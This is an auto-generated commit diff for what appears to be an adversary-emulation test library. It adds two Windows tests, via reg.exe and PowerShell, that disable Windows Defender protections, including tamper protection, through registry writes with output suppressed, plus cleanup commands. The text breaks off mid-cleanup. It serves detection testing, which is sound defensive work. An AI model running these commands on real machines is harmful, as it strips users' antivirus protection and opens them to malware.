Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -439,6 +439,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,Disable Hy
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,45,AMSI Bypass - Override AMSI via COM,17538258-5699-4ff1-92d1-5ac9b0dc21f5,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,46,AWS - GuardDuty Suspension or Deletion,11e65d8d-e7e4-470e-a3ff-82bc56ad938e,bash
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,48,Tamper with Windows Defender Registry - Reg.exe,1f6743da-6ecc-4a93-b03f-dc357e4b313f,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper with Windows Defender Registry - Powershell,a72cfef8-d252-48b3-b292-635d332625c3,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -285,6 +285,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tampe
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,38,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,45,AMSI Bypass - Override AMSI via COM,17538258-5699-4ff1-92d1-5ac9b0dc21f5,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,48,Tamper with Windows Defender Registry - Reg.exe,1f6743da-6ecc-4a93-b03f-dc357e4b313f,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper with Windows Defender Registry - Powershell,a72cfef8-d252-48b3-b292-635d332625c3,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -591,6 +591,8 @@
   - Atomic Test #45: AMSI Bypass - Override AMSI via COM [windows]
   - Atomic Test #46: AWS - GuardDuty Suspension or Deletion [iaas:aws]
   - Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos]
+  - Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe [windows]
+  - Atomic Test #49: Tamper with Windows Defender Registry - Powershell [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -405,6 +405,8 @@
   - Atomic Test #38: Delete Windows Defender Scheduled Tasks [windows]
   - Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
   - Atomic Test #45: AMSI Bypass - Override AMSI via COM [windows]
+  - Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe [windows]
+  - Atomic Test #49: Tamper with Windows Defender Registry - Powershell [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -22209,6 +22209,150 @@ defense-evasion:
           '
         name: sh
         elevation_required: true
+    - name: Tamper with Windows Defender Registry - Reg.exe
+      auto_generated_guid: 1f6743da-6ecc-4a93-b03f-dc357e4b313f
+      description: 'Disable Windows Defender by tampering with windows defender registry
+        using the utility "reg.exe"
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\"
+          /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
+          Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableBehaviorMonitoring\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableIntrusionPreventionSystem\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableIOAVProtection\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableOnAccessProtection\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableRealtimeMonitoring\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableRoutinelyTakingAction\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableScriptScanning\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v
+          \"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\" /f >NUL 2>nul \nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v
+          \"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\"
+          /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
+          Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App
+          and Browser protection\" /v \"DisallowExploitProtectionOverride\" /t REG_DWORD
+          /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\"
+          /v \"TamperProtection\"  /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\software\\microsoft\\windows
+          defender\\spynet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"0\" /f
+          >NUL 2>nul\nreg add \"HKLM\\Software\\Microsoft\\Windows Defender\" /v \"PUAProtection\"
+          /t REG_DWORD /d \"0\" /f >NUL 2>nul\n"
+        cleanup_command: "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\"
+          /v \"DisableAntiSpyware\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
+          Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableBehaviorMonitoring\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableIntrusionPreventionSystem\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableIOAVProtection\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableOnAccessProtection\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableRealtimeMonitoring\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableRoutinelyTakingAction\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableScriptScanning\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v
+          \"DisableEnhancedNotifications\" /t REG_DWORD /d \"0\" /f >NUL 2>nul \nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v
+          \"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\"
+          /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
+          Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender Security Center\\App
+          and Browser protection\" /v \"DisallowExploitProtectionOverride\" /t REG_DWORD
+          /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Microsoft\\Windows Defender\\Features\"
+          /v \"TamperProtection\"  /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\software\\microsoft\\windows
+          defender\\spynet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"1\" /f
+          >NUL 2>nul\nreg add \"HKLM\\Software\\Microsoft\\Windows Defender\" /v \"PUAProtection\"
+          /t REG_DWORD /d \"1\" /f >NUL 2>nul\n"
+        name: command_prompt
+        elevation_required: true
+    - name: Tamper with Windows Defender Registry - Powershell
+      auto_generated_guid: a72cfef8-d252-48b3-b292-635d332625c3
+      description: 'Disable Windows Defender by tampering with windows defender registry
+        through powershell
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: "Set-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\" -Name \"DisableAntiSpyware\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\" -Name \"DisableAntiVirus\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableBehaviorMonitoring\" -Value
+          1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableIntrusionPreventionSystem\" -Value 1 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          -Name \"DisableIOAVProtection\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableOnAccessProtection\" -Value
+          1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableRealtimeMonitoring\" -Value 1 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          -Name \"DisableRoutinelyTakingAction\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableScanOnRealtimeEnable\" -Value
+          1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableScriptScanning\" -Value 1 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" -Name
+          \"DisableEnhancedNotifications\" -Value 1  \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\SpyNet\" -Name \"DisableBlockAtFirstSeen\" -Value 1 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" -Name
+          \"SpynetReporting\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\MpEngine\" -Name \"MpEnablePus\" -Value 0 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows
+          Defender Security Center\\App and Browser protection\" -Name \"DisallowExploitProtectionOverride\"
+          -Value 0 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Features\"
+          -Name \"TamperProtection\"  -Value 0 \nSet-ItemProperty \"HKLM:\\software\\microsoft\\windows
+          defender\\spynet\" -Name \"SubmitSamplesConsent\" -Value 0 \nSet-ItemProperty
+          \"HKLM:\\Software\\Microsoft\\Windows Defender\" -Name \"PUAProtection\"
+          -Value 0 \n"
+        cleanup_command: "Set-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\" -Name \"DisableAntiSpyware\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\" -Name \"DisableAntiVirus\" -Value 0\nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableBehaviorMonitoring\" -Value
+          0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableIntrusionPreventionSystem\" -Value 0\nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          -Name \"DisableIOAVProtection\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableOnAccessProtection\" -Value
+          0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableRealtimeMonitoring\" -Value 0 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          -Name \"DisableRoutinelyTakingAction\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableScanOnRealtimeEnable\" -Value
+          0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableScriptScanning\" -Value 0 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" -Name
+          \"DisableEnhancedNotifications\" -Value 0  \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\SpyNet\" -Name \"DisableBlockAtFirstSeen\" -Value 0\nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" -Name
+          \"SpynetReporting\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\MpEngine\" -Name \"MpEnablePus\" -Value 1 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows
+          Defender Security Center\\App and Browser protection\" -Name \"DisallowExploitProtectionOverride\"
+          -Value 1 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Features\"
+          -Name \"TamperProtection\"  -Value 1\nSet-ItemProperty \"HKLM:\\software\\microsoft\\windows
+          defender\\spynet\" -Name \"SubmitSamplesConsent\" -Value 1 \nSet-ItemProperty
+          \"HKLM:\\Software\\Microsoft\\Windows Defender\" -Name \"PUAProtection\"
+          -Value 1 \n"
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:

atomics/Indexes/windows-index.yaml

@@ -18353,6 +18353,150 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: Tamper with Windows Defender Registry - Reg.exe
+      auto_generated_guid: 1f6743da-6ecc-4a93-b03f-dc357e4b313f
+      description: 'Disable Windows Defender by tampering with windows defender registry
+        using the utility "reg.exe"
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\"
+          /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
+          Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableBehaviorMonitoring\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableIntrusionPreventionSystem\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableIOAVProtection\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableOnAccessProtection\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableRealtimeMonitoring\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableRoutinelyTakingAction\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableScriptScanning\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v
+          \"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\" /f >NUL 2>nul \nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v
+          \"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\"
+          /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
+          Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App
+          and Browser protection\" /v \"DisallowExploitProtectionOverride\" /t REG_DWORD
+          /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\"
+          /v \"TamperProtection\"  /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\software\\microsoft\\windows
+          defender\\spynet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"0\" /f
+          >NUL 2>nul\nreg add \"HKLM\\Software\\Microsoft\\Windows Defender\" /v \"PUAProtection\"
+          /t REG_DWORD /d \"0\" /f >NUL 2>nul\n"
+        cleanup_command: "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\"
+          /v \"DisableAntiSpyware\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
+          Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableBehaviorMonitoring\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableIntrusionPreventionSystem\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableIOAVProtection\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableOnAccessProtection\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableRealtimeMonitoring\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableRoutinelyTakingAction\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          /v \"DisableScriptScanning\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v
+          \"DisableEnhancedNotifications\" /t REG_DWORD /d \"0\" /f >NUL 2>nul \nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v
+          \"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add
+          \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\"
+          /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
+          Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
+          add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender Security Center\\App
+          and Browser protection\" /v \"DisallowExploitProtectionOverride\" /t REG_DWORD
+          /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Microsoft\\Windows Defender\\Features\"
+          /v \"TamperProtection\"  /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\software\\microsoft\\windows
+          defender\\spynet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"1\" /f
+          >NUL 2>nul\nreg add \"HKLM\\Software\\Microsoft\\Windows Defender\" /v \"PUAProtection\"
+          /t REG_DWORD /d \"1\" /f >NUL 2>nul\n"
+        name: command_prompt
+        elevation_required: true
+    - name: Tamper with Windows Defender Registry - Powershell
+      auto_generated_guid: a72cfef8-d252-48b3-b292-635d332625c3
+      description: 'Disable Windows Defender by tampering with windows defender registry
+        through powershell
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: "Set-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\" -Name \"DisableAntiSpyware\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\" -Name \"DisableAntiVirus\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableBehaviorMonitoring\" -Value
+          1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableIntrusionPreventionSystem\" -Value 1 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          -Name \"DisableIOAVProtection\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableOnAccessProtection\" -Value
+          1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableRealtimeMonitoring\" -Value 1 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          -Name \"DisableRoutinelyTakingAction\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableScanOnRealtimeEnable\" -Value
+          1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableScriptScanning\" -Value 1 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" -Name
+          \"DisableEnhancedNotifications\" -Value 1  \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\SpyNet\" -Name \"DisableBlockAtFirstSeen\" -Value 1 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" -Name
+          \"SpynetReporting\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\MpEngine\" -Name \"MpEnablePus\" -Value 0 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows
+          Defender Security Center\\App and Browser protection\" -Name \"DisallowExploitProtectionOverride\"
+          -Value 0 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Features\"
+          -Name \"TamperProtection\"  -Value 0 \nSet-ItemProperty \"HKLM:\\software\\microsoft\\windows
+          defender\\spynet\" -Name \"SubmitSamplesConsent\" -Value 0 \nSet-ItemProperty
+          \"HKLM:\\Software\\Microsoft\\Windows Defender\" -Name \"PUAProtection\"
+          -Value 0 \n"
+        cleanup_command: "Set-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\" -Name \"DisableAntiSpyware\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\" -Name \"DisableAntiVirus\" -Value 0\nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableBehaviorMonitoring\" -Value
+          0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableIntrusionPreventionSystem\" -Value 0\nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          -Name \"DisableIOAVProtection\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableOnAccessProtection\" -Value
+          0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableRealtimeMonitoring\" -Value 0 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
+          -Name \"DisableRoutinelyTakingAction\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
+          Defender\\Real-Time Protection\" -Name \"DisableScanOnRealtimeEnable\" -Value
+          0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
+          Protection\" -Name \"DisableScriptScanning\" -Value 0 \nSet-ItemProperty
+          \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" -Name
+          \"DisableEnhancedNotifications\" -Value 0  \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
